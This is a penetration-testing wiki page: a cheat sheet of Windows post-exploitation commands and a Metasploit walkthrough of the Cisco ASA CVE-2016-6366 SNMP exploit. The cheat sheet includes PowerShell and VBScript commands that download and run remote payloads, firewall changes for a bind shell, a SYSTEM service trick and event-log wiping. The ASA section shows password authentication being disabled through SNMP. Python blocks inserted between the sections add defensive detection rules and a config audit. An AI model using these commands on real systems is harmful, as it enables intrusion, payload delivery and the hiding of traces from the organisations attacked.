    Pentest Wiki Part 4: Post-Exploitation (1)

    Post-Exploitation

    0x01 Introduction

    Post-exploitation is a critical component of a penetration test. This is where you distinguish yourself from the average hacker and actually deliver valuable information and intelligence from the test. Post-exploitation targets specific systems, identifies critical infrastructure, and goes after the information or data the company values most and tries hardest to protect. As you compromise one system after another, you should try to demonstrate the attacks that would have the greatest impact on the business.

    During post-exploitation, while attacking systems, take the time to determine what each system does and what the different user roles are. For example, suppose you have compromised the domain infrastructure and are running as an enterprise administrator or hold domain admin rights. You may be the domain admin, but what about the systems that do not communicate with Active Directory? What about the company's financial application? Could you take control of that system and, in the next payment cycle, route all of the company's money to a different account? What about the target's intellectual property?

    For example, suppose your client is a large software developer that ships custom-coded applications to its customers for use in manufacturing environments. Could you backdoor their source code and thereby compromise every one of their customers? That would seriously damage the credibility of their brand.

    Post-exploitation is a tricky business: you must take the time to understand what information is available to you and then work out which of it benefits you. An attacker typically spends a great deal of time on a compromised system. Think like a malicious attacker: be creative, adapt quickly, and rely on your own wits rather than on automated tools.

    Remote Administration

    NET USE \\ip\ipc$ password /user:username
        Establishes an IPC$ connection to the remote host; if it succeeds, you can try to view, query, ... whatever the account's permissions allow.
    NET USE z: \\ip\share password /user:username
        Maps the remote share as local drive z:.
    systeminfo /S ComputerName /U username /P password
        Displays the operating system configuration of a local or remote computer, including the service pack level.
    tasklist /S SERVER /U DOMAIN\username /P password
        Lists the processes currently running on the remote machine.
    taskkill /S SERVER /U DOMAIN\username /P password
        Kills a process on the remote server.
    powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://ip:port/[file]'))"
        Executes code fetched from a remote server.
    powershell.exe -w hidden -nop -ep bypass -c "(new-object net.webclient).DownloadFile('http://ip:port/file', 'C:\Windows\temp\testfile')"
        Downloads a file from a remote server.
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File test.ps1
        Executes test.ps1 locally.
    bitsadmin /transfer systemrepair /download /priority normal http://path/to/file c:\path\local\file
        Creates a job named systemrepair that downloads a file from a remote server.
    echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > wget.vbs
    cscript.exe wget.vbs http://ip:port/filename C:\Windows\temp\filename
        Downloads a file with VBScript.
    echo strFileURL = WScript.Arguments.Item(0):Set objXMLHTTP = CreateObject(^"MSXML2.XMLHTTP^"):objXMLHTTP.open ^"GET^", strFileURL, false:objXMLHTTP.send():shellcode = objXMLHTTP.responseText:strXML = ^"^<B64DECODE xmlns:dt=^" ^& Chr(34) ^& ^"urn:schemas-microsoft-com:datatypes^" ^& Chr(34) ^& ^" ^" ^& ^"dt:dt=^" ^& Chr(34) ^& ^"bin.base64^" ^& Chr(34) ^& ^"^>^" ^& shellcode ^& ^"^<^/B64DECODE^>^":Set oXMLDoc = CreateObject(^"MSXML2.DOMDocument.3.0^"):oXMLDoc.LoadXML(strXML):decode = oXMLDoc.selectsinglenode(^"B64DECODE^").nodeTypedValue:set oXMLDoc = nothing:Dim fso:Set fso = CreateObject(^"Scripting.FileSystemObject^"):Dim tempdir:Dim basedir:Set tempdir = fso.GetSpecialFolder(2):basedir = tempdir ^& ^"\^" ^& fso.GetTempName():fso.CreateFolder(basedir):tempexe = basedir ^& ^"\^" ^& ^"test.exe^":Dim adodbstream:Set adodbstream = CreateObject(^"ADODB.Stream^"):adodbstream.Type = 1:adodbstream.Open:adodbstream.Write decode:adodbstream.SaveToFile tempexe, 2:Dim wshell:Set wshell = CreateObject(^"Wscript.Shell^"):wshell.run tempexe, 0, true:fso.DeleteFile(tempexe):fso.DeleteFolder(basedir):Set fso = Nothing > %TEMP%\msf.vbs
    cscript.exe %TEMP%\msf.vbs http://ip:port/vbspayload.txt
        Downloads and executes a Metasploit VBS payload.
    PsExec.exe \\192.168.206.145 -accepteula -u username -p password cmd.exe /c ver
        Executes a Windows command remotely and returns the result.
    wmic /node:SERVER /user:DOMAIN\username /password:password process call create "cmd /c vssadmin list shadows 2>&1 > c:\temp\output.txt"
        Creates a new process on the remote server. No command output is returned.

    Proxy

    NETSH INTERFACE portproxy add v4tov4 listenport=LPORT connectaddress=RHOST connectport=RPORT [listenaddress=LHOST protocol=tcp]
        Forwards traffic from a local port to the specified port on a remote address.
    set http_proxy=http://your_proxy:your_port
    set http_proxy=http://username:password@your_proxy:your_port
    set https_proxy=https://your_proxy:your_port
    set https_proxy=https://username:password@your_proxy:your_port
        Uses a proxy from the command line.

    Whitelist

    NETSH FIREWALL show all
        Shows the allowed-program configuration for the domain/standard profiles.
    NETSH FIREWALL add allowedprogram C:\Windows\system32\cmd.exe cmd enable
        Adds a program to the firewall's allowed-program whitelist.
    NETSH FIREWALL delete allowedprogram cmd
        Removes an entry from the firewall allowedprogram whitelist; you can also remove it by path.
    NETSH FIREWALL show all
        Shows the port configuration for the domain/standard profiles.
    NETSH FIREWALL add portopening tcp 4444 bindshell enable all
        Adds TCP port 4444 to the port whitelist.


    Service

    sc create servicename type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe" & sc start servicename
        Creates a malicious service and obtains local SYSTEM privileges.

    Scheduler

    net use \\IP\ipc$ password /user:username
    at \\ComputerName time "command"
        The AT command schedules commands and programs to run on a computer at a specified time and date. net time [/domain] shows the current time.

    Logs

    del %WINDIR%\*.log /a /s /q /f
        Deletes every *.log file under the %WINDIR% directory.
    wevtutil el
        Lists the different log files the system keeps.
    for /f %a in ('wevtutil el') do @wevtutil cl "%a"
        Clears the contents of specific logs (here, every log that wevtutil el lists).
    powershell.exe -ep bypass -w hidden -c Clear-Eventlog -Log Application, System, Security
        Clears specific event logs.
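As an added defensive example (my code, not part of the wiki), the following Python runs a set of detection rules over Windows process-creation command lines for the remote-administration, proxy, whitelist, service, scheduler and log-clearing commands listed in the tables above. The rule names are mine and the sample command lines are constructed to mirror the cheat sheet; tune the regexes against your own telemetry before relying on them.

```python
import re
from collections import Counter
from typing import Dict, List

# One rule per technique in the cheat sheet above. Rule names are mine; the
# regexes are starting points, not production signatures.
RULES: Dict[str, re.Pattern] = {
    "ps_download_cradle": re.compile(
        r"powershell.*new-object\s+net\.webclient.*\.(downloadstring|downloadfile)\(", re.I),
    "ps_hidden_or_bypass": re.compile(
        r"powershell.*(-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass)", re.I),
    "bitsadmin_download": re.compile(r"bitsadmin.*/transfer.*/download", re.I),
    "vbs_dropped_by_echo": re.compile(r"\becho\s.*>\s*\S+\.vbs\b", re.I),
    "cscript_remote_url": re.compile(r"cscript(\.exe)?\s.*\.vbs\s+https?://", re.I),
    "service_with_cmd_binpath": re.compile(
        r'\bsc(\.exe)?\s+create\b.*binpath=\s*"?[^"]*\bcmd(\.exe)?\b', re.I),
    "at_remote_schedule": re.compile(r"\bat(\.exe)?\s+\\\\\S+\s+\d{1,2}:\d{2}", re.I),
    "wmic_remote_process": re.compile(r"wmic.*/node:.*process\s+call\s+create", re.I),
    "psexec_remote_exec": re.compile(r"psexec.*\\\\\S+.*\s-u\s", re.I),
    "firewall_whitelist_change": re.compile(
        r"netsh\s+firewall\s+add\s+(allowedprogram|portopening)", re.I),
    "portproxy_added": re.compile(r"netsh\s+interface\s+portproxy\s+add", re.I),
    "eventlog_cleared": re.compile(
        r"(wevtutil(\.exe)?\s+cl\b|clear-eventlog|\bdel\s.*\*\.log)", re.I),
    "ipc_admin_share": re.compile(r"net\s+use\s+\\\\\S+\\ipc\$", re.I),
}

# Rules that on their own justify a "high" triage bucket.
HIGH_CONFIDENCE = {
    "ps_download_cradle", "bitsadmin_download", "vbs_dropped_by_echo",
    "cscript_remote_url", "service_with_cmd_binpath", "psexec_remote_exec",
    "eventlog_cleared",
}

# Constructed sample command lines (203.0.113.0/24 is a documentation range).
SAMPLE_CMDLINES: List[str] = [
    r'''powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://203.0.113.5:8080/s.ps1'))"''',
    r'''bitsadmin /transfer systemrepair /download /priority normal http://203.0.113.5/f.exe c:\users\public\f.exe''',
    r'''cmd.exe /c echo shellcode = WScript.Arguments.Item(0):Set o = CreateObject(^"ADODB.Stream^") > %TEMP%\msf.vbs''',
    r'''cscript.exe C:\Windows\temp\wget.vbs http://203.0.113.5/p.txt C:\Windows\temp\p.exe''',
    r'''sc create updsvc type= own type= interact binPath= "c:\windows\system32\cmd.exe /c cmd.exe"''',
    r'''PsExec.exe \\FILESRV01 -accepteula -u CORP\svc -p Summer2024 cmd.exe /c ver''',
    r'''net use \\FILESRV01\ipc$ Summer2024 /user:CORP\svc & at \\FILESRV01 23:00 "cmd /c whoami"''',
    r'''wmic /node:FILESRV01 /user:CORP\svc /password:Summer2024 process call create "cmd /c vssadmin list shadows"''',
    r'''for /f %a in ('wevtutil el') do @wevtutil cl "%a"''',
    r'''powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\ops\nightly-backup.ps1''',
    r'''net use z: \\fileserver\public /user:CORP\alice''',
    r'''tasklist /S FILESRV01 /U CORP\admin /P Summer2024''',
]


def classify(cmdline: str) -> List[str]:
    """Names of every rule that matches one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def severity(labels: List[str]) -> str:
    """Coarse triage bucket: a high-confidence rule, any rule, or nothing."""
    if any(label in HIGH_CONFIDENCE for label in labels):
        return "high"
    return "medium" if labels else "none"


def scan(cmdlines: List[str]) -> List[dict]:
    """Run every rule over every command line and keep the result per line."""
    findings = []
    for cmdline in cmdlines:
        labels = classify(cmdline)
        findings.append({"cmdline": cmdline, "labels": labels, "severity": severity(labels)})
    return findings


def summarize(findings: List[dict]) -> Counter:
    """How often each technique was seen, for a quick overview of a host."""
    return Counter(label for f in findings for label in f["labels"])


if __name__ == "__main__":
    results = scan(SAMPLE_CMDLINES)
    for f in results:
        if f["labels"]:
            print(f"[{f['severity']:6}] {', '.join(f['labels'])}: {f['cmdline'][:70]}")
    print(dict(summarize(results)))
```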

    References

    1. How to execute metasploit vbs payload in cmd.exe?
    2. Hacking Windows Active Directory
    3. How to dump windows 2012 credentials?
    4. How to use PowerSploit Invoke-Mimikatz to dump credentials?
    5. How to use vssadmin?

    How-to-hack-Cisco-ASA-with-CVE-2016-6366

    Cisco ASA - CVE-2016-6366

    A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.

    The vulnerability is due to a buffer overflow in the affected area of the code. It affects all versions of SNMP (versions 1, 2c, and 3) when SNMP is enabled on a virtual or physical Cisco ASA device. An attacker could exploit the vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. A successful exploit could allow the attacker to execute arbitrary code and obtain full control of the system, or cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.

    Note: only traffic directed to the affected system can be used to exploit this vulnerability. It affects only systems configured in routed and transparent firewall mode and in single or multiple context mode. It can be triggered only by IPv4 traffic. The attacker needs to know the SNMP community string configured for SNMP version 1 and SNMP version 2c, or a valid username and password for SNMP version 3.
    Cisco has released software updates that address this vulnerability. The Workarounds section of the advisory lists mitigations.

    How to log in to a Cisco ASA?

    If you know nothing about the Cisco ASA device, try nmap or custom tools/methods to discover something useful.
    If SNMP is enabled, we can try to guess the password with Metasploit.

    msf auxiliary(snmp_login) > set PASSWORD public
    PASSWORD => public
    msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
    RHOSTS => 192.168.206.114
    msf auxiliary(snmp_login) > run
    
    [+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
    [*] Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

    Now CVE-2016-6366 can help us compromise the remote Cisco device.

    msf auxiliary(cisco_asa_extrabacon) > show options
    
    Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       COMMUNITY  public           yes       SNMP Community String
       MODE       pass-disable     yes       Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
       RETRIES    1                yes       SNMP Retries
       RHOST      192.168.206.114  yes       The target address
       RPORT      161              yes       The target port
       TIMEOUT    1                yes       SNMP Timeout
    
    msf auxiliary(cisco_asa_extrabacon) > run
    
    [*] Building pass-disable payload for version 9.2(1)...
    [*] Sending SNMP payload...
    [+] Clean return detected!
    [!] Don't forget to run pass-enable after logging in!
    [*] Auxiliary module execution completed

    If the exploit succeeds, try logging in with telnet. The attacker can log in to the Cisco device without a password.

    $ telnet 192.168.206.114
    ciscoasa> ?
      clear       Reset functions
      enable      Turn on privileged commands
      exit        Exit from the EXEC
      help        Interactive help for commands
      login       Log in as a particular user
      logout      Exit from the EXEC
      no          Negate a command or set its defaults
      ping        Send echo messages
      quit        Exit from the EXEC
      show        Show running system information
      traceroute  Trace route to destination

    How to check the Cisco version?

    ciscoasa> show version
    
    Cisco Adaptive Security Appliance Software Version 9.2(1)
    Device Manager Version 7.2(1)
    
    Compiled on Thu 24-Apr-14 12:14 PDT by builders
    System image file is "boot:/asa921-smp-k8.bin"
    Config file at boot was "startup-config"
    
    ciscoasa up 2 hours 25 mins
    
    Hardware:   ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
    Internal ATA Compact Flash, 256MB
    Slot 1: ATA Compact Flash, 8192MB
    BIOS Flash Firmware Hub @ 0x1, 0KB
    
    
     0: Ext: Management0/0       : address is 000c.29a9.88d6, irq 10
     1: Ext: GigabitEthernet0/0  : address is 000c.29a9.88e0, irq 5
     2: Ext: GigabitEthernet0/1  : address is 000c.29a9.88ea, irq 9
     3: Ext: GigabitEthernet0/2  : address is 000c.29a9.88f4, irq 10
    
    ASAv Platform License State: Unlicensed
    *Install -587174176 vCPU ASAv platform license for full functionality.
    The Running Activation Key is not valid, using default settings:
    
    Licensed features for this platform:
    Virtual CPUs                      : 0              perpetual
    Maximum Physical Interfaces       : 10             perpetual
    Maximum VLANs                     : 50             perpetual
    Inside Hosts                      : Unlimited      perpetual
    Failover                          : Active/Standby perpetual
    Encryption-DES                    : Enabled        perpetual
    Encryption-3DES-AES               : Enabled        perpetual
    Security Contexts                 : 0              perpetual
    GTP/GPRS                          : Disabled       perpetual
    AnyConnect Premium Peers          : 2              perpetual
    AnyConnect Essentials             : Disabled       perpetual
    Other VPN Peers                   : 250            perpetual
    Total VPN Peers                   : 250            perpetual
    Shared License                    : Disabled       perpetual
    AnyConnect for Mobile             : Disabled       perpetual
    AnyConnect for Cisco VPN Phone    : Disabled       perpetual
    Advanced Endpoint Assessment      : Disabled       perpetual
    UC Phone Proxy Sessions           : 2              perpetual
    Total UC Proxy Sessions           : 2              perpetual
    Botnet Traffic Filter             : Enabled        perpetual
    Intercompany Media Engine         : Disabled       perpetual
    Cluster                           : Disabled       perpetual
    
    This platform has an ASAv VPN Premium license.
    
    Serial Number: 9ATJDXTHK3B
    Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
    
    Image type          : Release
    Key version         : A
    
    Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016

    How to enter privileged mode?

    enable is used to enter Cisco configuration mode. Usually the password is empty.

    ciscoasa> help enable
    
    USAGE:
    
        enable [<priv_level>]
    
    DESCRIPTION:
    
    enable      Turn on privileged commands
    
    ciscoasa> enable ?
    
      <0-15>  Enter optional privilege level (0-15)
      <cr>
    
      ciscoasa> enable
      Password:
      ciscoasa# configure terminal
      ciscoasa(config)# ?
    
        aaa                           Enable, disable, or view user authentication,
                                      authorization and accounting
        aaa-server                    Configure a AAA server group or a AAA server
        access-group                  Bind an access-list to an interface to filter
                                      traffic
        access-list                   Configure an access control element
        arp                           Change or view ARP table, set ARP timeout
                                      value, view statistics
        as-path                       BGP autonomous system path filter
        asdm                          Configure Device Manager
        asp                           Configure ASP parameters
        auth-prompt                   Customize authentication challenge, reject or
                                      acceptance prompt
        auto-update                   Configure Auto Update
        banner                        Configure login/session banners
        bgp-community                 format for BGP community
        boot                          Set system boot parameters
        ca                            Certification authority
        call-home                     Smart Call-Home Configuration
        checkheaps                    Configure checkheap verification intervals
        class-map                     Configure MPF Class Map
        clear                         Clear
        client-update                 Configure and change client update parameters
        clock                         Configure time-of-day clock
        cluster                       Cluster configuration
        command-alias                 Create command alias
        community-list                Add a community list entry
        compression                   Configure global Compression parameters
        configure                     Configure using various methods
        console                       Serial console functions
        coredump                      Configure Coredump options
        crashinfo                     Enable/Disable writing crashinfo to flash
        crypto                        Configure IPSec, ISAKMP, Certification
                                      authority, key
        ctl-file                      Configure a ctl-file instance
        ctl-provider                  Configure a CTL Provider instance
        cts                           Cisco Trusted Security commands
        ddns                          Configure dynamic DNS update method
        dhcp-client                   Configure parameters for DHCP client operation
        dhcpd                         Configure DHCP Server
        dhcprelay                     Configure DHCP Relay Agent
        dns                           Add DNS functionality to an interface
        dns-group                     Set the global DNS server group
        dns-guard                     Enforce one DNS response per query
        domain-name                   Change domain name
        dynamic-access-policy-record  Dynamic Access Policy configuration commands
        dynamic-filter                Configure Dynamic Filter
        dynamic-map                   Configure crypto dynamic map
        enable                        Configure password for the enable command
        end                           Exit from configure mode
        established                   Allow inbound connections based on established
                                      connections
        event                         Configure event manager
        exit                          Exit from config mode
        failover                      Enable/disable failover feature
        filter                        Enable or disable URL, FTP, HTTPS, Java, and
                                      ActiveX filtering
        fips                          FIPS 140-2 compliance information
        firewall                      Switch to router/transparent mode
        fixup                         Add or delete inspection services
        flow-export                   Configure flow information export through
                                      NetFlow
        fragment                      Configure the IP fragment database
        ftp                           Set FTP mode
        ftp-map                       Configure advanced options for FTP inspection
        group-delimiter               The delimiter for tunnel-group lookup.
        group-policy                  Configure or remove a group policy
        gtp-map                       Configure advanced options for GTP inspection
        h225-map                      Configure advanced options for H225 inspection
        help                          Interactive help for commands
        hostname                      Change host name of the system
        hpm                           Configure TopN host statistics collection
        http                          Configure http server and https related
                                      commands
        http-map                      This command has been deprecated.
        icmp                          Configure access rules for ICMP traffic
        imap4s                        Configure the imap4s service
        interface                     Select an interface to configure
        ip                            Configure IP address pools
        ip                            Configure IP addresses, address pools, IDS, etc
        ipsec                         Configure transform-set, IPSec SA lifetime and
                                      PMTU Aging reset timer
        ipv6                          Configure IPv6 address pools
        ipv6                          Global IPv6 configuration commands
        ipv6-vpn-addr-assign          Global settings for VPN IP address assignment
                                      policy
        isakmp                        Configure ISAKMP options
        jumbo-frame                   Configure jumbo-frame support
        key                           Create various configuration keys
        l2tp                          Configure Global L2TP Parameters
        ldap                          Configure LDAP Mapping
        logging                       Configure logging levels, recipients and other
                                      options
        logout                        Logoff from config mode
        mac-address                   MAC address options
        mac-list                      Create a mac-list to filter based on MAC
                                      address
        management-access             Configure management access interface
        map                           Configure crypto map
        media-termination             Configure a media-termination instance
        mgcp-map                      Configure advanced options for MGCP inspection
        migrate                       Migrate IKEv1 configuration to IKEv2/SSL
        monitor-interface             Enable or disable failover monitoring on a
                                      specific interface
        mount                         Configure a system mount
        mroute                        Configure static multicast routes
        mtu                           Specify MTU(Maximum Transmission Unit) for an
                                      interface
        multicast-routing             Enable IP multicast
        name                          Associate a name with an IP address
        names                         Enable/Disable IP address to name mapping
        nat                           Associate a network with a pool of global IP
                                      addresses
        no                            Negate a command or set its defaults
        ntp                           Configure NTP
        nve                           Configure an Network Virtulization Endpoint
                                      (NVE)
        object                        Configure an object
        object-group                  Create an object group for use in
                                      'access-list', etc
        object-group-search           Enables object group search algorithm
        pager                         Control page length for pagination
        passwd                        Change Telnet console access password
        password                      Configure password encryption
        password-policy               Configure password policy options
        phone-proxy                   Configure a Phone proxy instance
        pim                           Configure Protocol Independent Multicast
        policy-list                   Define IP Policy list
        policy-map                    Configure MPF Parameter Map
        pop3s                         Configure the pop3s service
        prefix-list                   Build a prefix list
        priority-queue                Enter sub-command mode to set priority-queue
                                      attributes
        privilege                     Configure privilege levels for commands
        prompt                        Configure session prompt display
        quit                          Exit from config mode
        quota                         Configure quotas
        regex                         Define a regular expression
        remote-access                 Configure SNMP trap threshold for VPN
                                      remote-access sessions
        route                         Configure a static route for an interface
        route-map                     Create route-map or enter route-map
                                      configuration mode
        router                        Enable a routing process
        same-security-traffic         Enable same security level interfaces to
                                      communicate
        scansafe                      Scansafe configuration
        service                       Configure system services
        service-interface             service-interface for dynamic interface types
        service-policy                Configure MPF service policy
        setup                         Pre-configure the system
        sla                           IP Service Level Agreement
        smtp-server                   Configure default SMTP server address to be
                                      used for Email
        smtps                         Configure the smtps service
        snmp                          Configure the SNMP options
        snmp-map                      Configure an snmp-map, to control the operation
                                      of the SNMP inspection
        snmp-server                   Modify SNMP engine parameters
        ssh                           Configure SSH options
        ssl                           Configure SSL options
        sunrpc-server                 Create SUNRPC services table
        sysopt                        Set system functional options
        tcp-map                       Configure advanced options for TCP inspection
        telnet                        Add telnet access to system console or set idle
                                      timeout
        terminal                      Set terminal line parameters
        tftp-server                   Configure default TFTP server address and
                                      directory
        threat-detection              Show threat detection information
        time-range                    Define time range entries
        timeout                       Configure maximum idle times
        tls-proxy                     Configure a TLS proxy instance or the maximum
                                      sessions
        track                         Object tracking configuration commands
        tunnel-group                  Create and manage the database of connection
                                      specific records for IPSec connections
        tunnel-group-map              Specify policy by which the tunnel-group name
                                      is derived from the content of a certificate.
        uc-ime                        Configure a Cisco Intercompany Media Engine
                                      (UC-IME) instance
        url-block                     Enable URL pending block buffer and long URL
                                      support
        url-cache                     Enable/Disable URL caching
        url-server                    Configure a URL filtering server
        user-identity                 Configure user-identity firewall
        username                      Configure user authentication local database
        virtual                       Configure address for authentication virtual
                                      servers
        vnmc                          Configure VNMC params
        vpdn                          Configure VPDN feature
        vpn                           Configure VPN parameters.
        vpn-addr-assign               Global settings for VPN IP address assignment
                                      policy
        vpn-sessiondb                 Configure the VPN Session Manager
        vpnsetup                      Configure VPN Setup Commands
        vxlan                         Configure VXLAN system parameters
        wccp                          Web-Cache Coordination Protocol Commands
        webvpn                        Configure the WebVPN service
        xlate                         Configure an xlate option
        zonelabs-integrity            ZoneLabs integrity Firewall Server
                                      Configuration

    How to configure a Cisco interface?

    ciscoasa(config)# interface ?
    
    configure mode commands/options:
      GigabitEthernet  GigabitEthernet IEEE 802.3z
      Management       Management interface
      Redundant        Redundant Interface
      TVI              Tenant Virtual Interface
      vni              VNI Interface
      <cr>
    
    ciscoasa(config)# interface GigabitEthernet ?
    
    configure mode commands/options:
      <0-0>  GigabitEthernet interface number
    
    ciscoasa(config)# interface GigabitEthernet 0/?
    
    configure mode commands/options:
      <0-2>  GigabitEthernet interface number
    
    ciscoasa(config)# interface GigabitEthernet 0/0

    How to set an IP address?

    ciscoasa(config-if)# ?
    
    Interface configuration commands:
      authentication   authentication subcommands
      ddns             Configure dynamic DNS
      default          Set a command to its defaults
      delay            Specify interface throughput delay
      description      Interface specific description
      dhcp             Configure parameters for DHCP client
      dhcprelay        Configure DHCP Relay Agent
      duplex           Configure duplex operation
      exit             Exit from interface configuration mode
      flowcontrol      Configure flowcontrol operation
      hello-interval   Configures EIGRP-IPv4 hello interval
      help             Interactive help for interface subcommands
      hold-time        Configures EIGRP-IPv4 hold time
      igmp             IGMP interface commands
      ip               Configure the ip address
      ipv6             IPv6 interface subcommands
      mac-address      Assign MAC address to interface
      management-only  Dedicate an interface to management. Block thru traffic
      mfib             Interface Specific MFIB Control
      multicast        Configure multicast routing
      nameif           Assign name to interface
      no               Negate a command or set its defaults
      ospf             OSPF interface commands
      pim              PIM interface commands
      pppoe            Configure parameters for PPPoE client
      rip              Router Information Protocol
      security-level   Specify the security level of this interface after this
                       keyword, Eg: 0, 100 etc. The relative security level between
                       two interfaces determines the way the Adaptive Security
                       Algorithm is applied. A lower security_level interface is
                       outside relative to a higher level interface and equivalent
                       interfaces are outside to each other
      shutdown         Shutdown the selected interface
      speed            Configure speed operation
      split-horizon    Configures EIGRP-IPv4 split-horizon
      summary-address  Configures EIGRP-IPv4 summary-address
    ciscoasa(config-if)# ip address ?
    
    interface mode commands/options:
      Hostname or A.B.C.D  Firewall's network interface address
      dhcp                 Keyword to use DHCP to poll for information. Enables the
                           DHCP client feature on the specified interface
      pppoe                Keyword to use PPPoE to poll for information. Enables
                           the PPPoE client feature on the specified interface
    ciscoasa(config)#  ip address 192.168.206.114 255.255.255.0
    ciscoasa(config-if)# no shutdown
    ciscoasa(config-if)# exit
    ciscoasa(config)# exit
    ciscoasa# ping 192.168.206.1
    Type escape sequence to abort.
    Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
    !!!!!
    Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms

    How to enable the SNMP service?

    ciscoasa# configure terminal
    ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public

    How to enable the SSH service?

    ciscoasa# configure terminal
    ciscoasa(config)# username admin password password
    ciscoasa(config)# aaa authentication ssh console LOCAL
    ciscoasa(config)# passwd password
    ciscoasa(config)# crypto key generate rsa ?            
    
    configure mode commands/options:
      general-keys  Generate a general purpose RSA key pair for signing and
                    encryption
      label         Provide a label
      modulus       Provide number of modulus bits on the command line
      noconfirm     Specify this keyword to suppress all interactive prompting.
      usage-keys    Generate seperate RSA key pairs for signing and encryption
      <cr>
    ciscoasa(config)# crypto key generate rsa modulus ?
    
    configure mode commands/options:
      1024  1024 bits
      2048  2048 bits
      4096  4096 bits
      512   512 bits
      768   768 bits
    
    ciscoasa(config)#  ssh 192.168.206.1 255.255.255.0 inside
    ciscoasa(config)#  ssh 192.168.206.137 255.255.255.0 inside
    ciscoasa(config)#  ssh version 2

    How to enable the Telnet service?

    ciscoasa# configure terminal
    ciscoasa(config)# aaa authentication telnet console LOCAL
    ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
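As an added defensive example (my code, not the wiki's and not a Cisco tool), this Python audits ASA configuration lines for the exposure that CVE-2016-6366 depends on (a guessable v1/v2c community string on an SNMP-enabled interface) and for the management-access settings configured in this section. Patching is the actual fix; this only checks the configuration. Both configs are constructed: the weak one mirrors the commands typed above, the hardened one shows the corrected settings with placeholder secrets.

```python
import re
from typing import Dict, List

# Constructed: the management and SNMP settings as typed in this section.
WEAK_CONFIG = """\
hostname ciscoasa
interface GigabitEthernet0/0
 nameif inside
 security-level 100
 ip address 192.168.206.114 255.255.255.0
 no shutdown
passwd password
username admin password password
aaa authentication ssh console LOCAL
aaa authentication telnet console LOCAL
snmp-server host inside 192.168.206.1 community 0 public
ssh 192.168.206.1 255.255.255.0 inside
ssh 192.168.206.137 255.255.255.0 inside
telnet 0.0.0.0 0.0.0.0 inside
"""

# Constructed: the same device with SNMPv3 (auth and priv), /32-scoped SSHv2,
# no telnet and an enable password. Secrets are placeholders, not real values.
HARDENED_CONFIG = """\
hostname ciscoasa
enable password <ENABLE_SECRET_PLACEHOLDER>
snmp-server group v3ops v3 priv
snmp-server user ops v3ops v3 auth sha <AUTH_KEY_PLACEHOLDER> priv aes 128 <PRIV_KEY_PLACEHOLDER>
snmp-server host inside 192.168.206.1 version 3 ops
aaa authentication ssh console LOCAL
ssh 192.168.206.1 255.255.255.255 inside
ssh version 2
"""

# (finding id, severity, regex applied to one stripped config line, advice)
LINE_CHECKS = [
    ("snmp_default_community", "high",
     re.compile(r"^snmp-server\s+(host\s+\S+\s+\S+\s+)?community\s+(0\s+)?(public|private)\b", re.I),
     "a default community string is the one secret the SNMP exploit needs; "
     "use SNMPv3 with auth and priv, or at least a long unique string"),
    ("snmp_v1v2c_host", "high",
     re.compile(r"^snmp-server\s+host\s+\S+\s+\S+\s+community\b", re.I),
     "v1/v2c host entry; replace with 'snmp-server host <if> <ip> version 3 <user>'"),
    ("telnet_any_source", "high",
     re.compile(r"^telnet\s+0\.0\.0\.0\s+0\.0\.0\.0\s+\S+", re.I),
     "telnet allowed from any source on this interface; remove it and manage over SSHv2"),
    ("telnet_enabled", "medium",
     re.compile(r"^telnet\s+\d+\.\d+\.\d+\.\d+\s+(?!0\.0\.0\.0\b)\S+\s+\S+", re.I),
     "telnet is cleartext; prefer SSHv2"),
    ("ssh_broad_source", "low",
     re.compile(r"^ssh\s+\d+\.\d+\.\d+\.\d+\s+(?!255\.255\.255\.255\b)\S+\s+\S+", re.I),
     "scope each ssh line to a /32 management host"),
]
SEVERITY_ORDER = ["none", "low", "medium", "high"]


def _finding(fid, sev, line_no, text, advice) -> Dict:
    return {"id": fid, "severity": sev, "line": line_no, "text": text, "advice": advice}


def audit(config: str) -> List[Dict]:
    """Per-line findings in config order, then whole-config findings."""
    lines = [l.strip() for l in config.splitlines()]
    lines = [l for l in lines if l and not l.startswith("!")]  # '!' starts a comment
    findings = []
    for n, line in enumerate(lines, 1):
        for fid, sev, rx, advice in LINE_CHECKS:
            if rx.match(line):
                findings.append(_finding(fid, sev, n, line, advice))
    has_ssh = any(re.match(r"ssh\s+\d", l, re.I) for l in lines)
    has_sshv2 = any(re.match(r"ssh\s+version\s+2\b", l, re.I) for l in lines)
    if has_ssh and not has_sshv2:
        findings.append(_finding("ssh_version_missing", "medium", None, "",
                                 "add 'ssh version 2' so SSHv1 is never negotiated"))
    if not any(re.match(r"enable\s+password\s+\S", l, re.I) for l in lines):
        findings.append(_finding("enable_password_missing", "high", None, "",
                                 "an empty enable password lets any login reach configuration mode"))
    return findings


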